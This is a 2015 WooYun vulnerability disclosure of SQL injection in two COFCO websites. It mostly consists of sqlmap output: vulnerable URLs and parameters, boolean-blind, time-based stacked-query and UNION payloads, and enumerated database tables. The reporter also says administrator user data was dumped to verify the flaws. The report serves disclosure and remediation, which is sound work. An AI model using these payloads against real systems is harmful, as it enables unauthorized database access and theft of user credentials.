当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0133263

漏洞标题:中粮两个站点sql注入漏洞打包(可获取大量敏感信息)

相关厂商:中粮集团有限公司

漏洞作者: 路人甲

提交时间:2015-08-11 09:42

修复时间:2015-09-25 10:46

公开时间:2015-09-25 10:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-11: 细节已通知厂商并且等待厂商处理中
2015-08-11: 厂商已经确认,细节仅向厂商公开
2015-08-21: 细节向核心白帽子及相关领域专家公开
2015-08-31: 细节向普通白帽子公开
2015-09-10: 细节向实习白帽子公开
2015-09-25: 细节向公众公开

简要描述:

test

详细说明:

中粮两个站点存在很多sql注入漏洞,整理一下发个合集。

漏洞证明:

第一个站
首先是:http://506pingjia.cofco.com:8080/IR/activityDetail.jsp?ID=1
注入点是:ID

Parameter: ID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ID=1' AND 1571=1571 AND 'EtYH'='EtYH
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: ID=1';WAITFOR DELAY '0:0:5'--
    Type: UNION query
    Title: Generic UNION query (NULL) - 16 columns
    Payload: ID=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(106)+CHAR(112)+CHAR(106)+CHAR(113)+CHAR(84)+CHAR(122)+CHAR(107)+CHAR(70)+CHAR(71)+CHAR(84)+CHAR(117)+CHAR(108)+CHAR(104)+CHAR(112)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(120)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--


http://506pingjia.cofco.com:8080/IR/noticeDetail.jsp?ID=274
注入点ID

4.jpg


Parameter: ID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ID=1' AND 1571=1571 AND 'EtYH'='EtYH
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: ID=1';WAITFOR DELAY '0:0:5'--
    Type: UNION query
    Title: Generic UNION query (NULL) - 16 columns
    Payload: ID=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(106)+CHAR(112)+CHAR(106)+CHAR(113)+CHAR(84)+CHAR(122)+CHAR(107)+CHAR(70)+CHAR(71)+CHAR(84)+CHAR(117)+CHAR(108)+CHAR(104)+CHAR(112)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(120)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--


http://506pingjia.cofco.com:8080/IR/notice.jsp?ClassID=20129988
注入点ClassID

Parameter: ClassID (GET)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: ClassID=20129988');WAITFOR DELAY '0:0:5'--
    Type: UNION query
    Title: Generic UNION query (NULL) - 16 columns
    Payload: ClassID=20129988') UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(122)+CHAR(112)+CHAR(98)+CHAR(113)+CHAR(114)+CHAR(107)+CHAR(88)+CHAR(118)+CHAR(65)+CHAR(105)+CHAR(120)+CHAR(78)+CHAR(114)+CHAR(82)+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(107)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--


通过注入可跑出dbs

1.jpg


跑出了IR中的表

2.jpg


[31 tables]
+--------------------+
| AddressList        |
| AllClass           |
| AllNews            |
| C_cjwt_tb          |
| C_cwbg_tb          |
| C_cwbg_tb1         |
| C_cwzy_tb          |
| C_gdfw_tb          |
| C_ggth_tb          |
| C_ggth_tb_20140503 |
| C_gszl_tb          |
| C_hdjb_tb          |
| C_lxwm_tb          |
| C_shzr_tb          |
| E_AddressList      |
| E_AllClass         |
| E_cjwt_tb          |
| E_cwbg_tb          |
| E_cwzy_tb          |
| E_gdfw_tb          |
| E_ggth_tb          |
| E_ggth_tb_20140503 |
| E_gszl_tb          |
| E_hdjb_tb          |
| E_lxwm_tb          |
| E_shzr_tb          |
| Job_Class          |
| Job_Info           |
| sqlmapoutput       |
| useradmin          |
| yyyzjw_tb          |
+--------------------+


跑了一下表中的管理员数据做验证

3.jpg


9.jpg


第二个站:http://cofcomag.cofco.com/cn/periodical/old.aspx?periodical=2015
注入点periodical

Parameter: periodical (GET)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: periodical=2015';WAITFOR DELAY '0:0:5'--


通过注入可跑出当前库

6.jpg


可跑出库中的表

7.jpg


+----------------------------------------------+
| ASSC_CON                                     |
| ASSET_INFO                                   |
| CON_DOWNLOAD                                 |
| CON_INFO                                     |
| CON_INFO_CORRELATION                         |
| CON_PRODUCT                                  |
| DOWNLOAD_INFO                                |
| DOWNLOAD_TYPE                                |
| HLpst                                        |
| Hnvestormenu                                 |
| I99_Tmp                                      |
| Inc                                          |
| Item_Tbm                                     |
| LABEL_INFO                                   |
| MENU_CONTENT                                 |
| ORGANIZATIONA                                |
| PICTURE_INFO                                 |
| PRODUCT_INFO                                 |
| SEARCHTEMPLATE1                              |
| SYSTEM_MENU                                  |
| SYSTEM_PRIVILEGE                             |
| SYSTEM_PRIVILEGE_KEY                         |
| SYSTEM_ROLE                                  |
| SYSTEM_ROLE_USER                             |
| SYSTEM_USER_TBL                              |
| SYS_FUNCTION                                 |
| SYS_FUNCTION_ROLE                            |
| SYS_MENU                                     |
| SYS_MENU_FUNCTION                            |
| SYS_ROLE                                     |
| SYS_ROLE_USER                                |
| SYS_USER                                     |
| TEM_INFO                                     |
| TEM_LABEL                                    |
| USER_ORGANIZATION                            |
| HLTSPOi_DqWNLOAD\\x12\\t\\x0bg\\r\\x038\\x11숇ʬ㽜晦 |
| HLTSPOi_DqWNLOAD\x12\t\x0bg\r\x038\x11숇       |
| columnning                                   |
| dtpropertiey                                 |
| en_info_view                                 |
| searchtemplate_en1                           |
| searchteoplate                               |
| sp_magcontent                                |
| sqlmapoutput                                 |
| v_4portal                                    |
| v_searchcontent                              |
| v_searchcontent_bak                          |
| v_searchcontent_en                           |
+----------------------------------------------+


跑了一下SYS_USER的数据进行验证

8.jpg

修复方案:

做好过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-08-11 10:45

厂商回复:

非常感谢!

最新状态:

暂无